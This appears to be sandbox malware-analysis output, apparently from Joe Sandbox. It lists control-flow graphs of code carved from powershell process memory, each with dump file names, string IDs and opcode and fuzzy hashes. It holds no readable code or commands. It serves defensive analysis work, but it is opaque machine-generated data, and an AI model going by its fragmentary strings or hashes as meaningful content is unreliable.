                                                                                                control_flow_graph 2003 68e094d-68e0950 2004 68e0956-68e09e6 2003->2004 2005 68e0952-68e0954 2003->2005 2011 68e09ec-68e0a06 2004->2011 2012 68e0b82-68e0ba3 2004->2012 2005->2004 2013 68e0a08-68e0a2d 2011->2013 2014 68e0a35-68e0a42 2011->2014 2015 68e0ba5-68e0bca 2012->2015 2016 68e0bd2-68e0c7e 2012->2016 2013->2014 2017 68e0b3c-68e0b7d 2014->2017 2018 68e0a48-68e0a69 2014->2018 2015->2016 2041 68e0c84-68e0c92 2016->2041 2042 68e1082-68e10ad 2016->2042 2017->2012 2018->2017 2024 68e0a6f-68e0b3a 2018->2024 2024->2012 2044 68e0c9c-68e0cc4 2041->2044 2054 68e10b2-68e10ff 2042->2054 2044->2042 2049 68e0cca-68e0ceb 2044->2049 2052 68e0ced-68e0cf3 2049->2052 2053 68e0d05-68e0d07 2049->2053 2055 68e0cf7-68e0d03 2052->2055 2056 68e0cf5 2052->2056 2058 68e0d09-68e0d0f 2053->2058 2059 68e0d21-68e0d49 2053->2059 2055->2053 2056->2053 2060 68e0d13-68e0d1f 2058->2060 2061 68e0d11 2058->2061 2059->2042 2068 68e0d4f-68e0d70 2059->2068 2060->2059 2061->2059 2071 68e0d8a-68e0d8c 2068->2071 2072 68e0d72-68e0d78 2068->2072 2075 68e0d8e-68e0d94 2071->2075 2076 68e0da6-68e0dd1 2071->2076 2073 68e0d7c-68e0d88 2072->2073 2074 68e0d7a 2072->2074 2073->2071 2074->2071 2077 68e0d98-68e0da4 2075->2077 2078 68e0d96 2075->2078 2076->2042 2083 68e0dd7-68e0ddc 2076->2083 2077->2076 2078->2076 2084 68e0dde-68e0de4 2083->2084 2085 68e0df4-68e0e07 2083->2085 2086 68e0de8-68e0df2 2084->2086 2087 68e0de6 2084->2087 2085->2042 2088 68e0e0d-68e0e12 2085->2088 2086->2085 2087->2085 2089 68e0e2a-68e0e42 2088->2089 2090 68e0e14-68e0e1a 2088->2090 2089->2042 2091 68e0e48-68e0e53 2089->2091 2093 68e0e1e-68e0e28 2090->2093 2094 68e0e1c 2090->2094 2095 68e0e6b-68e0e83 2091->2095 2096 68e0e55-68e0e5b 2091->2096 2093->2089 2094->2089 2095->2042 2100 68e0e89-68e0e90 2095->2100 2098 68e0e5f-68e0e69 2096->2098 2099 68e0e5d 2096->2099 2098->2095 2099->2095 2101 68e0ea8-68e0efd 2100->2101 2102 68e0e92-68e0e98 2100->2102 2101->2042 2110 68e0f03-68e0f28 2101->2110 2104 68e0e9c-68e0ea6 2102->2104 2105 68e0e9a 2102->2105 2104->2101 2105->2101 2110->2042 2112 68e0f2e-68e1035 2110->2112 2112->2042 2125 68e1037-68e1080 2112->2125 2125->2054
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$Pq^q
                                                                                                • API String ID: 0-653376292
                                                                                                • Opcode ID: 7ea20d6ec68ea1cbe5aea348b6ed5c6619da3efebd6b121a836889732b4d2ece
                                                                                                • Instruction ID: dd71b49764e6af5c9a00a924e00c902f1d414130f045c57e11ee509cbe9a7029
                                                                                                • Opcode Fuzzy Hash: 7ea20d6ec68ea1cbe5aea348b6ed5c6619da3efebd6b121a836889732b4d2ece
                                                                                                • Instruction Fuzzy Hash: F9226E34B002189FD764DB18C851BADBBF2EF89304F54C4A9D909AB395CB71ED868F91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2130 6fe2d78-6fe2d9d 2131 6fe2f43-6fe2f8a 2130->2131 2132 6fe2da3-6fe2da8 2130->2132 2139 6fe30c8-6fe3116 2131->2139 2140 6fe2f90-6fe2f95 2131->2140 2133 6fe2daa-6fe2db0 2132->2133 2134 6fe2dc0-6fe2dcc 2132->2134 2135 6fe2db4-6fe2dbe 2133->2135 2136 6fe2db2 2133->2136 2142 6fe2dd2-6fe2dd5 2134->2142 2143 6fe2ef0-6fe2efa 2134->2143 2135->2134 2136->2134 2182 6fe311a-6fe311c 2139->2182 2183 6fe3118 2139->2183 2144 6fe2fad-6fe2fb1 2140->2144 2145 6fe2f97-6fe2f9d 2140->2145 2142->2143 2147 6fe2ddb-6fe2de2 2142->2147 2150 6fe2efc-6fe2f05 2143->2150 2151 6fe2f08-6fe2f0e 2143->2151 2152 6fe307a-6fe3084 2144->2152 2153 6fe2fb7-6fe2fb9 2144->2153 2148 6fe2f9f 2145->2148 2149 6fe2fa1-6fe2fab 2145->2149 2147->2131 2160 6fe2de8-6fe2ded 2147->2160 2148->2144 2149->2144 2156 6fe2f14-6fe2f20 2151->2156 2157 6fe2f10-6fe2f12 2151->2157 2158 6fe3086-6fe308e 2152->2158 2159 6fe3091-6fe3097 2152->2159 2154 6fe2fbb-6fe2fc7 2153->2154 2155 6fe2fc9 2153->2155 2162 6fe2fcb-6fe2fcd 2154->2162 2155->2162 2163 6fe2f22-6fe2f40 2156->2163 2157->2163 2165 6fe309d-6fe30a9 2159->2165 2166 6fe3099-6fe309b 2159->2166 2167 6fe2def-6fe2df5 2160->2167 2168 6fe2e05-6fe2e09 2160->2168 2162->2152 2171 6fe2fd3-6fe2feb 2162->2171 2174 6fe30ab-6fe30c5 2165->2174 2166->2174 2169 6fe2df9-6fe2e03 2167->2169 2170 6fe2df7 2167->2170 2168->2143 2173 6fe2e0f-6fe2e11 2168->2173 2169->2168 2170->2168 2186 6fe2fed-6fe2ff3 2171->2186 2187 6fe3005-6fe3017 2171->2187 2176 6fe2e13-6fe2e1f 2173->2176 2177 6fe2e21 2173->2177 2184 6fe2e23-6fe2e25 2176->2184 2177->2184 2188 6fe3126 2182->2188 2183->2188 2184->2143 2189 6fe2e2b-6fe2e43 2184->2189 2191 6fe2ff7-6fe3003 2186->2191 2192 6fe2ff5 2186->2192 2199 6fe301e-6fe3077 2187->2199 2196 6fe2e5d-6fe2e75 2189->2196 2197 6fe2e45-6fe2e4b 2189->2197 2191->2187 2192->2187 2206 6fe2e7c-6fe2e7e 2196->2206 2200 6fe2e4f-6fe2e5b 2197->2200 2201 6fe2e4d 2197->2201 2200->2196 2201->2196 2207 6fe2e96-6fe2eed 2206->2207 2208 6fe2e80-6fe2e86 2206->2208 2209 6fe2e8a-6fe2e8c 2208->2209 2210 6fe2e88 2208->2210 2209->2207 2210->2207
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: 58382133ead1ca203370768db08006188882355c8590065a16aeacd8c3f26013
                                                                                                • Instruction ID: 3f0d866bd1d3e8cf9b0d36f3d3154b48b3a9f51c143526303b628701932cf613
                                                                                                • Opcode Fuzzy Hash: 58382133ead1ca203370768db08006188882355c8590065a16aeacd8c3f26013
                                                                                                • Instruction Fuzzy Hash: D6913632F043558FDB558B7888146AABFF6AFC5311B1484BBC505CB291EF35CA4AC792

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2212 68e4c71-68e4c74 2213 68e4c7a-68e4cfb 2212->2213 2214 68e4c76-68e4c78 2212->2214 2219 68e4cfd-68e4d22 2213->2219 2220 68e4d2a-68e4d75 2213->2220 2214->2213 2219->2220 2224 68e4d7c-68e4d89 2220->2224 2225 68e4d8f-68e4dd6 2224->2225 2226 68e7029-68e7072 2224->2226 2229 68e4e1d-68e4e2a 2225->2229 2230 68e4dd8-68e4e17 2225->2230 2242 68e7077-68e70c7 2226->2242 2229->2226 2232 68e4e30-68e4e86 2229->2232 2230->2229 2232->2226 2239 68e4e8c-68e4ee2 2232->2239 2239->2226 2246 68e4ee8-68e4f51 2239->2246 2245 68e712f 2242->2245 2245->2245 2250 68e4f56-68e4f82 2246->2250 2250->2242 2253 68e4f88-68e4fab 2250->2253 2256 68e4fb1-68e4fc3 2253->2256 2257 68e4fcc-68e4ff0 2256->2257 2258 68e4fc5 2256->2258 2259 68e501f-68e508c 2257->2259 2260 68e4ff2-68e5017 2257->2260 2258->2257 2261 68e5093-68e50b7 2258->2261 2259->2261 2260->2259 2262 68e50b9-68e50de 2261->2262 2263 68e50e6-68e5123 2261->2263 2262->2263 2271 68e512a-68e5137 2263->2271 2272 68e513d-68e5170 2271->2272 2273 68e6dd4-68e6e1d 2271->2273 2277 68e519f-68e51ac 2272->2277 2278 68e5172-68e5197 2272->2278 2273->2256 2277->2273 2279 68e51b2-68e5208 2277->2279 2278->2277 2279->2273 2286 68e520e-68e5279 2279->2286 2293 68e527f-68e52ba 2286->2293 2294 68e5870-68e5894 2286->2294 2302 68e52bc-68e52e1 2293->2302 2303 68e52e9-68e52f6 2293->2303 2295 68e5896-68e58bb 2294->2295 2296 68e58c3-68e58d0 2294->2296 2295->2296 2296->2273 2297 68e58d6-68e5925 2296->2297 2311 68e592b-68e592d 2297->2311 2312 68e6e22-68e6eda 2297->2312 2302->2303 2305 68e52fc-68e5324 2303->2305 2306 68e5664-68e56ad 2303->2306 2305->2306 2313 68e532a-68e5352 2305->2313 2345 68e574b-68e5765 2306->2345 2315 68e5933-68e5945 2311->2315 2318 68e6edc-68e6f01 2312->2318 2319 68e6f09-68e6f3e 2312->2319 2313->2306 2322 68e5358-68e53ae 2313->2322 2320 68e594e-68e5972 2315->2320 2321 68e5947 2315->2321 2318->2319 2319->2226 2333 68e6f44-68e6f72 2319->2333 2324 68e5974-68e5999 2320->2324 2325 68e59a1-68e5a01 2320->2325 2321->2320 2323 68e5a08-68e5a2c 2321->2323 2322->2306 2347 68e53b4-68e544c 2322->2347 2329 68e5a2e-68e5a53 2323->2329 2330 68e5a5b-68e5a68 2323->2330 2324->2325 2325->2323 2329->2330 2336 68e5a6e-68e5a9c 2330->2336 2337 68e6d84-68e6dcd 2330->2337 2333->2226 2348 68e6f78-68e6fea 2333->2348 2336->2337 2346 68e5aa2-68e5ad0 2336->2346 2337->2315 2349 68e5767-68e578c 2345->2349 2350 68e5794-68e57c9 2345->2350 2346->2337 2358 68e5ad6-68e5b04 2346->2358 2347->2306 2379 68e5452-68e54e6 2347->2379 2380 68e6fec-68e7007 2348->2380 2381 68e7018-68e7024 2348->2381 2349->2350 2350->2273 2362 68e57cf-68e57f3 2350->2362 2358->2337 2367 68e5b0a-68e5be7 2358->2367 2362->2273 2371 68e57f9-68e5855 2362->2371 2401 68e5ead-68e5ed1 2367->2401 2402 68e5bed-68e5c07 2367->2402 2394 68e586b 2371->2394 2395 68e5857-68e5866 2371->2395 2379->2345 2408 68e54ec-68e5506 2379->2408 2380->2224 2381->2224 2394->2271 2395->2271 2404 68e5ed3-68e5ef8 2401->2404 2405 68e5f00-68e6016 2401->2405 2406 68e5c09-68e5c2e 2402->2406 2407 68e5c36-68e5c43 2402->2407 2404->2405 2455 68e601c-68e6036 2405->2455 2456 68e6279-68e62a7 2405->2456 2406->2407 2409 68e5c49-68e5c8d 2407->2409 2410 68e5e64-68e5ea8 2407->2410 2411 68e550f-68e5533 2408->2411 2412 68e5508 2408->2412 2409->2410 2429 68e5c93-68e5cb3 2409->2429 2410->2401 2415 68e5535-68e555a 2411->2415 2416 68e5562-68e55b3 2411->2416 2412->2411 2413 68e565f 2412->2413 2414 68e55ba-68e55de 2412->2414 2413->2345 2414->2294 2422 68e55e4-68e5611 2414->2422 2415->2416 2416->2414 2422->2294 2429->2410 2437 68e5cb9-68e5cec 2429->2437 2437->2410 2445 68e5cf2-68e5d52 2437->2445 2445->2410 2452 68e5d58-68e5e06 2445->2452 2452->2410 2475 68e5e08-68e5e62 2452->2475 2460 68e6038-68e6044 2455->2460 2461 68e6060 2455->2461 2471 68e62ac-68e62fc 2456->2471 2462 68e604e-68e6054 2460->2462 2463 68e6046-68e604c 2460->2463 2464 68e6066-68e60b4 2461->2464 2467 68e605e 2462->2467 2463->2467 2464->2456 2478 68e60ba-68e60cf 2464->2478 2467->2464 2471->2337 2475->2401 2483 68e60e9-68e611e 2478->2483 2484 68e60d1-68e60d7 2478->2484 2483->2456 2493 68e6124-68e6144 2483->2493 2485 68e60db-68e60e7 2484->2485 2486 68e60d9 2484->2486 2485->2483 2486->2483 2493->2456 2495 68e614a-68e622e 2493->2495 2495->2456 2506 68e6230-68e6277 2495->2506 2506->2471
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                • API String ID: 0-1420252700
                                                                                                • Opcode ID: a4a55d1d26d87bfababa43aa41bd19fd7c58d37b23ffa27a496f615bb2803132
                                                                                                • Instruction ID: 0ad012dc0ef7e4a7600fb44570c35695805957d7aadc0484881ceefb37d36f99
                                                                                                • Opcode Fuzzy Hash: a4a55d1d26d87bfababa43aa41bd19fd7c58d37b23ffa27a496f615bb2803132
                                                                                                • Instruction Fuzzy Hash: E8D230B4A002149FDB54CB54C894BA9B7B2EF95304F50C1E9DA09AF391CB71EE86CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2916 671c408-671c452 2919 671c454-671c46a 2916->2919 2920 671c4a8-671c4d3 2916->2920 2925 671c482-671c490 2919->2925 2926 671c46c-671c472 2919->2926 2923 671c501-671c50d 2920->2923 2924 671c4d5-671c4e2 2920->2924 2933 671c530-671c534 2923->2933 2934 671c50f-671c511 2923->2934 2924->2923 2935 671c4e4-671c4e6 2924->2935 2927 671c492 2925->2927 2928 671c49b-671c4a5 2925->2928 2929 671c474 2926->2929 2930 671c476-671c478 2926->2930 2927->2928 2929->2925 2930->2925 2937 671c682-671c68c 2933->2937 2938 671c53a-671c560 2933->2938 2934->2933 2936 671c513-671c52e 2934->2936 2939 671c4f4-671c4fe 2935->2939 2940 671c4e8-671c4ee 2935->2940 2936->2933 2947 671c562 2938->2947 2948 671c567-671c569 2938->2948 2940->2939 2941 671c6ae-671c6c8 2940->2941 2949 671c678 2941->2949 2950 671c6ca-671c741 2941->2950 2947->2948 2951 671c589-671c58f 2948->2951 2952 671c56b-671c583 2948->2952 2957 671c67f 2949->2957 2953 671c591 2951->2953 2954 671c599-671c5b2 2951->2954 2960 671c585-671c587 2952->2960 2961 671c5b7-671c607 call 671aea8 2952->2961 2953->2954 2958 671c664-671c674 2954->2958 2957->2937 2958->2957 2965 671c676 2958->2965 2960->2951 2960->2961 2975 671c609-671c62b call 671aea8 2961->2975 2976 671c62d 2961->2976 2965->2949 2979 671c630-671c634 2975->2979 2976->2979 2981 671c636-671c638 call 671d220 2979->2981 2982 671c64f-671c662 2979->2982 2984 671c63e-671c644 2981->2984 2982->2958 2984->2982
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <\r$<\r$3(
                                                                                                • API String ID: 0-2243276901
                                                                                                • Opcode ID: b448cc0a43d64b904e3e294decebfc8c1e46bc33a46b8039d5e1ef23a59fdb17
                                                                                                • Instruction ID: cc143fc60dbbde794e24c4df4f348c16c60dac4431c826afe5c44886b0ab0e61
                                                                                                • Opcode Fuzzy Hash: b448cc0a43d64b904e3e294decebfc8c1e46bc33a46b8039d5e1ef23a59fdb17
                                                                                                • Instruction Fuzzy Hash: 69A1A071B41208DFCB55DFA8E855ABDBBF2EF88311F14846AE801AB350DA39DE41CB54

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2986 6fe2d55-6fe2d9d 2988 6fe2f43-6fe2f8a 2986->2988 2989 6fe2da3-6fe2da8 2986->2989 2996 6fe30c8-6fe3116 2988->2996 2997 6fe2f90-6fe2f95 2988->2997 2990 6fe2daa-6fe2db0 2989->2990 2991 6fe2dc0-6fe2dcc 2989->2991 2992 6fe2db4-6fe2dbe 2990->2992 2993 6fe2db2 2990->2993 2999 6fe2dd2-6fe2dd5 2991->2999 3000 6fe2ef0-6fe2efa 2991->3000 2992->2991 2993->2991 3039 6fe311a-6fe311c 2996->3039 3040 6fe3118 2996->3040 3001 6fe2fad-6fe2fb1 2997->3001 3002 6fe2f97-6fe2f9d 2997->3002 2999->3000 3004 6fe2ddb-6fe2de2 2999->3004 3007 6fe2efc-6fe2f05 3000->3007 3008 6fe2f08-6fe2f0e 3000->3008 3009 6fe307a-6fe3084 3001->3009 3010 6fe2fb7-6fe2fb9 3001->3010 3005 6fe2f9f 3002->3005 3006 6fe2fa1-6fe2fab 3002->3006 3004->2988 3017 6fe2de8-6fe2ded 3004->3017 3005->3001 3006->3001 3013 6fe2f14-6fe2f20 3008->3013 3014 6fe2f10-6fe2f12 3008->3014 3015 6fe3086-6fe308e 3009->3015 3016 6fe3091-6fe3097 3009->3016 3011 6fe2fbb-6fe2fc7 3010->3011 3012 6fe2fc9 3010->3012 3019 6fe2fcb-6fe2fcd 3011->3019 3012->3019 3020 6fe2f22-6fe2f40 3013->3020 3014->3020 3022 6fe309d-6fe30a9 3016->3022 3023 6fe3099-6fe309b 3016->3023 3024 6fe2def-6fe2df5 3017->3024 3025 6fe2e05-6fe2e09 3017->3025 3019->3009 3028 6fe2fd3-6fe2feb 3019->3028 3031 6fe30ab-6fe30c5 3022->3031 3023->3031 3026 6fe2df9-6fe2e03 3024->3026 3027 6fe2df7 3024->3027 3025->3000 3030 6fe2e0f-6fe2e11 3025->3030 3026->3025 3027->3025 3043 6fe2fed-6fe2ff3 3028->3043 3044 6fe3005-6fe300c 3028->3044 3033 6fe2e13-6fe2e1f 3030->3033 3034 6fe2e21 3030->3034 3041 6fe2e23-6fe2e25 3033->3041 3034->3041 3045 6fe3126 3039->3045 3040->3045 3041->3000 3046 6fe2e2b-6fe2e43 3041->3046 3048 6fe2ff7-6fe3003 3043->3048 3049 6fe2ff5 3043->3049 3051 6fe3013-6fe3017 3044->3051 3053 6fe2e5d-6fe2e6b 3046->3053 3054 6fe2e45-6fe2e4b 3046->3054 3048->3044 3049->3044 3056 6fe301e-6fe3077 3051->3056 3062 6fe2e72-6fe2e75 3053->3062 3057 6fe2e4f-6fe2e5b 3054->3057 3058 6fe2e4d 3054->3058 3057->3053 3058->3053 3063 6fe2e7c-6fe2e7e 3062->3063 3064 6fe2e96-6fe2eed 3063->3064 3065 6fe2e80-6fe2e86 3063->3065 3066 6fe2e8a-6fe2e8c 3065->3066 3067 6fe2e88 3065->3067 3066->3064 3067->3064
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q
                                                                                                • API String ID: 0-2291298209
                                                                                                • Opcode ID: 5df5f82c86184474db3ce86491824e0bfc01714ed8ad5b527266e0581de99e63
                                                                                                • Instruction ID: 7341c3976e9a45eb4da8f9f1c5884b79ffb04f7753b0ab5c74215d63a050da5a
                                                                                                • Opcode Fuzzy Hash: 5df5f82c86184474db3ce86491824e0bfc01714ed8ad5b527266e0581de99e63
                                                                                                • Instruction Fuzzy Hash: F4312435E04715CFEBA58F75C540A667FFAAF41210B0980BAD404CB162FB74CB45CBA2

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3069 6fe4970-6fe4980 3070 6fe4982-6fe498e 3069->3070 3071 6fe4990 3069->3071 3072 6fe4992-6fe4994 3070->3072 3071->3072 3073 6fe4a0f-6fe4a19 3072->3073 3074 6fe4996-6fe49a1 3072->3074 3077 6fe4a1b-6fe4a22 3073->3077 3078 6fe4a25-6fe4a2b 3073->3078 3075 6fe49bf 3074->3075 3076 6fe49a3-6fe49a9 3074->3076 3081 6fe49c1-6fe49cd 3075->3081 3079 6fe49af-6fe49bb 3076->3079 3080 6fe49ab-6fe49ad 3076->3080 3082 6fe4a2d-6fe4a2f 3078->3082 3083 6fe4a31-6fe4a3d 3078->3083 3084 6fe49bd 3079->3084 3080->3084 3081->3073 3090 6fe49cf-6fe49d6 3081->3090 3085 6fe4a3f-6fe4a5b 3082->3085 3083->3085 3084->3081 3091 6fe4a5e-6fe4a69 3090->3091 3092 6fe49dc-6fe49e1 3090->3092 3094 6fe49f9-6fe4a02 3092->3094 3095 6fe49e3-6fe49e9 3092->3095 3100 6fe4a07-6fe4a0c 3094->3100 3096 6fe49ed-6fe49f7 3095->3096 3097 6fe49eb 3095->3097 3096->3094 3097->3094
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q
                                                                                                • API String ID: 0-831282457
                                                                                                • Opcode ID: c26a20650390217a61b49ae012ab955ccc067b514f5a3ae0d61fcf3ff83946b0
                                                                                                • Instruction ID: d109b9538039a8a44d003263a3b9ec059cd797e6ec45e76f6ff168ae1854d574
                                                                                                • Opcode Fuzzy Hash: c26a20650390217a61b49ae012ab955ccc067b514f5a3ae0d61fcf3ff83946b0
                                                                                                • Instruction Fuzzy Hash: 9D31E536B142198FE7549E59D844A2BFBE6EBC4621B24C43FD919CB249EE32D842C790

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3102 6fe4850-6fe485d 3103 6fe485f-6fe486b 3102->3103 3104 6fe486d 3102->3104 3105 6fe486f-6fe4871 3103->3105 3104->3105 3106 6fe48fe-6fe4908 3105->3106 3107 6fe4877-6fe488f 3105->3107 3108 6fe490a-6fe4910 3106->3108 3109 6fe4913-6fe4919 3106->3109 3114 6fe48a9-6fe48d2 3107->3114 3115 6fe4891-6fe4897 3107->3115 3111 6fe491f-6fe492b 3109->3111 3112 6fe491b-6fe491d 3109->3112 3113 6fe492d-6fe494a 3111->3113 3112->3113 3124 6fe494d-6fe4952 3114->3124 3125 6fe48d4-6fe48e2 3114->3125 3117 6fe489b-6fe48a7 3115->3117 3118 6fe4899 3115->3118 3117->3114 3118->3114 3124->3125 3128 6fe48e9-6fe48f8 3125->3128 3128->3106
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q
                                                                                                • API String ID: 0-831282457
                                                                                                • Opcode ID: 69f6769ad57e978ee1084aa51452c3ae9857eef054914b6db4ecbf4d2643a3cd
                                                                                                • Instruction ID: e968692dc7b7fd0518107ddc47a340df9aa7b47d8c3b104fd2e659017661d5b2
                                                                                                • Opcode Fuzzy Hash: 69f6769ad57e978ee1084aa51452c3ae9857eef054914b6db4ecbf4d2643a3cd
                                                                                                • Instruction Fuzzy Hash: C5214B35B043049BEB64566A980073EBBD69FC4B15F60C82EE509EB3C4DD31DD45C3A1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3129 68e6e27-68e6e64 3132 68e6e66-68e6e6b 3129->3132 3133 68e6e70-68e6eb2 3129->3133 3136 68e7077-68e70c7 3132->3136 3141 68e6ebb 3133->3141 3142 68e6eb4-68e6eb9 3133->3142 3139 68e712f 3136->3139 3139->3139 3143 68e6ec0-68e6eda 3141->3143 3142->3143 3144 68e6edc-68e6f01 3143->3144 3145 68e6f09-68e6f3e 3143->3145 3144->3145 3149 68e7029-68e7072 3145->3149 3150 68e6f44-68e6f72 3145->3150 3149->3136 3150->3149 3153 68e6f78-68e6fea 3150->3153 3163 68e6fec-68e7007 3153->3163 3164 68e7018-68e7024 3153->3164 3165 68e4d7c-68e4d89 3163->3165 3164->3165 3165->3149 3166 68e4d8f-68e4dd6 3165->3166 3169 68e4e1d-68e4e2a 3166->3169 3170 68e4dd8-68e4e17 3166->3170 3169->3149 3171 68e4e30-68e4e86 3169->3171 3170->3169 3171->3149 3176 68e4e8c-68e4ee2 3171->3176 3176->3149 3179 68e4ee8-68e4f3c 3176->3179 3182 68e4f41-68e4f51 3179->3182 3183 68e4f56-68e4f82 3182->3183 3183->3136 3186 68e4f88-68e4fab 3183->3186 3189 68e4fb1-68e4fc3 3186->3189 3190 68e4fcc-68e4ff0 3189->3190 3191 68e4fc5 3189->3191 3192 68e501f-68e508c 3190->3192 3193 68e4ff2-68e5017 3190->3193 3191->3190 3194 68e5093-68e50b7 3191->3194 3192->3194 3193->3192 3195 68e50b9-68e50de 3194->3195 3196 68e50e6-68e5123 3194->3196 3195->3196 3204 68e512a-68e5137 3196->3204 3205 68e513d-68e5170 3204->3205 3206 68e6dd4-68e6e1d 3204->3206 3210 68e519f-68e51ac 3205->3210 3211 68e5172-68e5197 3205->3211 3206->3189 3210->3206 3212 68e51b2-68e5208 3210->3212 3211->3210 3212->3206 3219 68e520e-68e5279 3212->3219 3226 68e527f-68e52ba 3219->3226 3227 68e5870-68e5894 3219->3227 3235 68e52bc-68e52e1 3226->3235 3236 68e52e9-68e52f6 3226->3236 3228 68e5896-68e58bb 3227->3228 3229 68e58c3-68e58d0 3227->3229 3228->3229 3229->3206 3230 68e58d6-68e5925 3229->3230 3244 68e592b-68e592d 3230->3244 3245 68e6e22 3230->3245 3235->3236 3238 68e52fc-68e5324 3236->3238 3239 68e5664-68e56ad 3236->3239 3238->3239 3246 68e532a-68e5352 3238->3246 3271 68e574b-68e5765 3239->3271 3247 68e5933-68e5945 3244->3247 3245->3143 3246->3239 3252 68e5358-68e53ae 3246->3252 3250 68e594e-68e5972 3247->3250 3251 68e5947 3247->3251 3254 68e5974-68e5999 3250->3254 3255 68e59a1-68e5a01 3250->3255 3251->3250 3253 68e5a08-68e5a2c 3251->3253 3252->3239 3273 68e53b4-68e544c 3252->3273 3257 68e5a2e-68e5a53 3253->3257 3258 68e5a5b-68e5a68 3253->3258 3254->3255 3255->3253 3257->3258 3263 68e5a6e-68e5a9c 3258->3263 3264 68e6d84-68e6dcd 3258->3264 3263->3264 3272 68e5aa2-68e5ad0 3263->3272 3264->3247 3274 68e5767-68e578c 3271->3274 3275 68e5794-68e57c9 3271->3275 3272->3264 3282 68e5ad6-68e5b04 3272->3282 3273->3239 3299 68e5452-68e54e6 3273->3299 3274->3275 3275->3206 3285 68e57cf-68e57f3 3275->3285 3282->3264 3289 68e5b0a-68e5be7 3282->3289 3285->3206 3293 68e57f9-68e5855 3285->3293 3318 68e5ead-68e5ed1 3289->3318 3319 68e5bed-68e5c07 3289->3319 3311 68e586b 3293->3311 3312 68e5857-68e5866 3293->3312 3299->3271 3325 68e54ec-68e5506 3299->3325 3311->3204 3312->3204 3321 68e5ed3-68e5ef8 3318->3321 3322 68e5f00-68e6016 3318->3322 3323 68e5c09-68e5c2e 3319->3323 3324 68e5c36-68e5c43 3319->3324 3321->3322 3372 68e601c-68e6036 3322->3372 3373 68e6279-68e62a7 3322->3373 3323->3324 3326 68e5c49-68e5c8d 3324->3326 3327 68e5e64-68e5ea8 3324->3327 3328 68e550f-68e5533 3325->3328 3329 68e5508 3325->3329 3326->3327 3346 68e5c93-68e5cb3 3326->3346 3327->3318 3332 68e5535-68e555a 3328->3332 3333 68e5562-68e55b3 3328->3333 3329->3328 3330 68e565f 3329->3330 3331 68e55ba-68e55de 3329->3331 3330->3271 3331->3227 3339 68e55e4-68e5611 3331->3339 3332->3333 3333->3331 3339->3227 3346->3327 3354 68e5cb9-68e5cec 3346->3354 3354->3327 3362 68e5cf2-68e5d52 3354->3362 3362->3327 3369 68e5d58-68e5e06 3362->3369 3369->3327 3392 68e5e08-68e5e62 3369->3392 3377 68e6038-68e6044 3372->3377 3378 68e6060 3372->3378 3388 68e62ac-68e62fc 3373->3388 3379 68e604e-68e6054 3377->3379 3380 68e6046-68e604c 3377->3380 3381 68e6066-68e60b4 3378->3381 3384 68e605e 3379->3384 3380->3384 3381->3373 3395 68e60ba-68e60cf 3381->3395 3384->3381 3388->3264 3392->3318 3400 68e60e9-68e611e 3395->3400 3401 68e60d1-68e60d7 3395->3401 3400->3373 3410 68e6124-68e6144 3400->3410 3402 68e60db-68e60e7 3401->3402 3403 68e60d9 3401->3403 3402->3400 